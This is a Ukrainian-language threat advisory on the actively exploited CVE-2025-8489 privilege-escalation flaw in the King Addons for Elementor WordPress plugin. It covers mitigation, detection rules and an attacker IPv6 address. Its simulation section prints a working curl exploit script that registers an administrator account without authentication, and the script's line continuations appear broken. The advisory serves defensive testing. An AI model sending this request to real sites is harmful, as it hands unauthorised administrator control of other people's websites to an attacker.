Критична уразливість King Addons для Elementor під активною експлуатацією

Резюме

Критична неаутентифікована вразливість підвищення привілеїв (CVE-2025-8489) у плагіні King Addons для Elementor WordPress дозволяє атакам реєструвати нових користувачів з привілегіями адміністратора. Ця вразливість активно експлуатується з 31 жовтня 2025 року, причому Wordfence блокує десятки тисяч спроб. Зловмисники експлуатують цю проблематику через спеціально сформовані POST-запити, що надсилаються до кінцевої точки admin-ajax.php. Версії від 24.12.92 до 51.1.14 зазнали впливу, але виправлення доступне у версії 51.1.35.

Розслідування

Телеметрія Wordfence зареєструвала понад 48 400 спроб експлуатації, з помітним зростанням кількості спроб 9–10 листопада 2025 року. Найбільш активна IPv6 адреса джерела – 2602:fa59:3:424::1. Шкідливі навантаження використовують дані HTTP POST, що встановлюють параметр user_role до administrator під час робочого процесу реєстрації. Жодного додаткового впровадження шкідливого програмного забезпечення не спостерігалося, крім створення підроблених облікових записів адміністратора.

Зменшення загрози

Оновіть King Addons для Elementor до версії 51.1.35 або новішої. Увімкніть захисти брандмауера Wordfence, які надійшли 4 серпня 2025 року (преміум) і 3 вересня 2025 року (безкоштовно). Аудитуйте списки користувачів WordPress на наявність несподіваних облікових записів адміністратора і постійно переглядайте журнали на наявність підозрілих шаблонів POST.

Реакція

Запускайте оповіщення про трафік POST до /wp-admin/admin-ajax.php, яке включає user_role=administrator. Блокуйте зловмисні IP-адреси, приділяючи особливу увагу виділеному IPv6 джерелу. Проводьте перевірки гігієни облікових записів і видаляйте несанкціонованих адміністраторів. Розгорніть сигнатури IDS на хостах, налаштовані на спостережену структуру запиту.

Виконання симуляції

Попередня умова: Телеметрія та первірка базового рівня повинні бути пройдені.

• Опис атаки та команди:
  Противник виявляє CVE-2025-8489 у плагіні King Addons для Elementor. Вони формують POST-запит доadmin-ajax.phpщо включає параметрaction=king_addons_user_registerнеобхідний для плагінаandпримуще роль нового користувача доадміністраторчерезuser_role=administrator. Надіславши цей запит безпосередньо до вразливої кінцевої точки, атакувач отримує привілейований обліковий запис WordPress без необхідності попередньої аутентифікації. Навантаження закодоване за допомогою URL для імітації реалістичного веб-клієнта.

• Скрипт регресивного тестування:

  #!/usr/bin/env bash
  # Скрипт експлуатації для підвищення привілеїв у King Addons для Elementor (CVE‑2025‑8489)
  
  TARGET="http://webserver.example.com"
  ENDPOINT="/wp-admin/admin-ajax.php"
  
  # Спеціально підготовлені дані POST (URL‑encoded)
  POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator"
  
  echo "[*] Відправлення шкідливого навантаження..."
  curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/x-www-form-urlencoded" 
       --data "${POST_DATA}"
  
  echo -e "n[+] Експлуатація відправлена. Перевірте SIEM для згенерованого оповіщення."

• Команди очищення:

  # Видалити зловмисного користувача, створеного під час тесту
  curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" 
    -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')"
  echo "[*] Очищено."